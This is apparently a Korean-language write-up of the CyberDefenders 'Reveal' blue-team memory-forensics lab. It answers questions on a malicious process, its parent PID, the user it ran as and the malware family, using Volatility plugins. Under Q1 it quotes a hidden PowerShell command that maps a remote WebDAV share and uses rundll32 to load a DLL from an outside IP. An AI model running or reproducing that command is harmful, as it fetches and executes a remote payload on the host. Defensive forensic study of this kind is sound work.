Reveal Blue Team Lab

해당 문제는 CyberDefenders의 Reveal 문제에 대한 풀이입니다.

---

1. Challenge description

As a cybersecurity analyst for a leading financial institution, an alert from your SIEM solution has flagged unusual activity on an internal workstation. Given the sensitive financial data at risk, immediate action is required to prevent potential breaches.

Your task is to delve into the provided memory dump from the compromised system. You need to identify basic Indicators of Compromise (IOCs) and determine the extent of the intrusion. Investigate the malicious commands or files executed in the environment, and report your findings in detail to aid in remediation and enhance future defenses.

 

Q1.
Identifying the name of the malicious process helps in understanding the nature of the attack. What is the name of the malicious process?

powershell.exe -windowstyle hidden net use \45.9.74.32@8888\davwwwroot\ ; rundll32 \45.9.74.32@8888\davwwwroot\3435.dll,entry:

pstree로 프로세스들을 확인하던 중 powershell 프로세스의 실행된 명령어 인자값을 보면 net use나 hidden 등 공격 행위로 판단할 명령어들이 실행된 것으로 보인다. 

Q2.
Knowing the parent process ID (PID) of the malicious process aids in tracing the process hierarchy and understanding the attack flow. What is the parent PID of the malicious process?

pstree 플러그인으로 생성한 파일을 보면 왼쪽 숫자는 해당 프로세스의 PID이고 오른쪽 숫자가 PPID 로 질문에서의 parent PID에 해당한다.

Q3.
Determining the file name used by the malware for executing the second-stage payload is crucial for identifying subsequent malicious activities. What is the file name that the malware uses to execute the second-stage payload?

해당 질문 또한 위 powershell이 실행한 명령어를 확인하다보면 답을 확인할 수 있었다.

Q4.
Identifying the shared directory on the remote server helps trace the resources targeted by the attacker. What is the name of the shared directory being accessed on the remote server?

이 질문은 저 파일의 디렉토리를 묻는 문제였다.

Q5.
What is the MITRE sub-technique ID used by the malware to execute the second-stage payload?

해당 질문은 chat gpt로 풀었다.

Q6.
Identifying the username under which the malicious process runs helps in assessing the compromised account and its potential impact. What is the username that the malicious process runs under?

해당 질문을 해결하기 위해 getsids라는 플러그인을 사용했다.

Q7
Knowing the name of the malware family is essential for correlating the attack with known threats and developing appropriate defenses. What is the name of the malware family?

해당 질문은 virus total을 통해 알 수 있었다.